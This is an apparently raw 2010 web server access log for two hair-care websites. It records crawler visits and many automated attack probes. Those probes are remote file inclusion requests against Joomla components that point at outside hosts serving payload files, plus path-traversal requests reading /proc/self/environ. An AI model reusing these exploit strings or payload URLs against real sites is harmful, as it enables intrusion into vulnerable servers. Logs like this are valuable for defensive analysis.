74.124.198.60 - - [07/Jun/2010:17:29:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:29:19 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:29:19 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:29:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:29:19 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:29:19 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:29:23 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:29:23 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:29:23 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
92.242.90.229 - - [07/Jun/2010:17:31:02 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "growlonghairfast.com"
92.242.90.229 - - [07/Jun/2010:17:31:07 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "growlonghairfast.com"
74.95.165.158 - - [07/Jun/2010:17:31:55 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)" "growlonghairfast.com"
74.95.165.158 - - [07/Jun/2010:17:31:55 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:17:32:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5451 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.121.208.42 - - [07/Jun/2010:17:44:23 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.208.42 - - [07/Jun/2010:17:44:26 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.208.42 - - [07/Jun/2010:17:44:29 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
77.88.25.28 - - [07/Jun/2010:17:49:39 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14594 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:17:50:39 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:17:50:45 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:17:50:50 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:17:51:19 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:18:00:17 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:18:01:01 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:18:04:28 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
118.129.166.213 - - [07/Jun/2010:18:04:29 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:05:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:05:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
77.88.25.28 - - [07/Jun/2010:18:06:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14273 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:06:58 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:06:58 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
65.34.231.229 - - [07/Jun/2010:18:10:28 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.freehairsecrets.com"
65.34.231.229 - - [07/Jun/2010:18:10:29 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.freehairsecrets.com"
77.88.25.28 - - [07/Jun/2010:18:11:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15307 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:16:27 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:16:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:16:27 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:16:30 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:16:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:16:30 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:16:57 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:16:57 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:16:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:16:58 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:16:58 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:16:58 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:19:49 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:19:49 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:19:50 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:19:53 -0700] "GET /logs/access_100510.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:19:53 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:19:53 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:19:53 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:19:54 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:19:54 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
212.241.179.30 - - [07/Jun/2010:18:19:55 -0700] "GET /logs/access_100510.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:19:55 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:19:55 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
67.210.244.65 - - [07/Jun/2010:18:22:13 -0700] "GET /logs/access_100412.log%20%20//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.244.65 - - [07/Jun/2010:18:22:13 -0700] "GET /components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.244.65 - - [07/Jun/2010:18:22:13 -0700] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.244.65 - - [07/Jun/2010:18:22:29 -0700] "GET /logs/access_100412.log%20%20//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.244.65 - - [07/Jun/2010:18:22:29 -0700] "GET /components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.244.65 - - [07/Jun/2010:18:22:29 -0700] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.208.42 - - [07/Jun/2010:18:24:28 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [07/Jun/2010:18:24:31 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [07/Jun/2010:18:24:34 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
83.125.73.41 - - [07/Jun/2010:18:24:55 -0700] "GET /logs/access_100412.log%20%20//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.125.73.41 - - [07/Jun/2010:18:24:55 -0700] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.125.73.41 - - [07/Jun/2010:18:24:55 -0700] "GET /components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.125.73.41 - - [07/Jun/2010:18:24:56 -0700] "GET /components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.125.73.41 - - [07/Jun/2010:18:24:56 -0700] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.125.73.41 - - [07/Jun/2010:18:24:56 -0700] "GET /logs/access_100412.log%20%20//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:18:25:09 -0700] "GET /logs/access.log//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:18:25:09 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:18:25:10 -0700] "GET /logs//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:18:25:35 -0700] "GET /logs/access.log//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:18:25:35 -0700] "GET /index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:18:25:36 -0700] "GET /logs//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:18:26:38 -0700] "GET /logs/access_100329.log//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.213 - - [07/Jun/2010:18:26:44 -0700] "GET /logs/access_100329.log//index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:18:35:34 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12475 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.210.244.65 - - [07/Jun/2010:18:38:09 -0700] "GET /logs/access_100503.log//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.244.65 - - [07/Jun/2010:18:38:49 -0700] "GET /logs/access_100503.log//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.125.73.41 - - [07/Jun/2010:18:41:26 -0700] "GET /logs/access_100503.log//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:18:41:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14563 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
67.210.244.65 - - [07/Jun/2010:18:41:34 -0700] "GET /logs/access_100412.log//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.244.65 - - [07/Jun/2010:18:41:42 -0700] "GET /logs/access.log//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.125.73.41 - - [07/Jun/2010:18:42:12 -0700] "GET /logs/access_100503.log//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.244.65 - - [07/Jun/2010:18:42:47 -0700] "GET /logs/access_100412.log//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.244.65 - - [07/Jun/2010:18:42:55 -0700] "GET /logs/access.log//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:43:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:18:43:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
208.115.111.245 - - [07/Jun/2010:18:44:36 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:18:44:36 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
83.125.73.41 - - [07/Jun/2010:18:45:40 -0700] "GET /logs/access_100412.log//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.125.73.41 - - [07/Jun/2010:18:45:54 -0700] "GET /logs/access.log//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.125.73.41 - - [07/Jun/2010:18:46:15 -0700] "GET /logs/access_100412.log//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.125.73.41 - - [07/Jun/2010:18:46:19 -0700] "GET /logs/access.log//components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [07/Jun/2010:18:54:36 -0700] "GET /index.php?option=com_extcalendar&controler=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
184.73.75.129 - - [07/Jun/2010:18:56:21 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "growlonghairfast.com"
184.73.75.129 - - [07/Jun/2010:18:56:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9328 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "growlonghairfast.com"
208.80.193.35 - - [07/Jun/2010:18:58:27 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 2.0.50727; Media Center PC 4.0)" "www.freehairsecrets.com"
184.73.75.129 - - [07/Jun/2010:18:59:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17323 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:19:01:09 -0700] "GET /logs/access_100412.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:19:01:09 -0700] "GET /logs/access_100412.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:19:01:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:19:01:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:19:01:09 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.241.179.30 - - [07/Jun/2010:19:01:09 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:19:03:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8394 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
222.236.47.182 - - [07/Jun/2010:19:03:59 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dishop.co.kr//upload/movie/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.236.47.182 - - [07/Jun/2010:19:03:59 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dishop.co.kr//upload/movie/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.236.47.182 - - [07/Jun/2010:19:03:59 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dishop.co.kr//upload/movie/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:19:05:45 -0700] "GET /?D=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:19:05:49 -0700] "GET /?M=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:19:05:53 -0700] "GET /?N=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:19:05:57 -0700] "GET /?S=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [07/Jun/2010:19:06:01 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
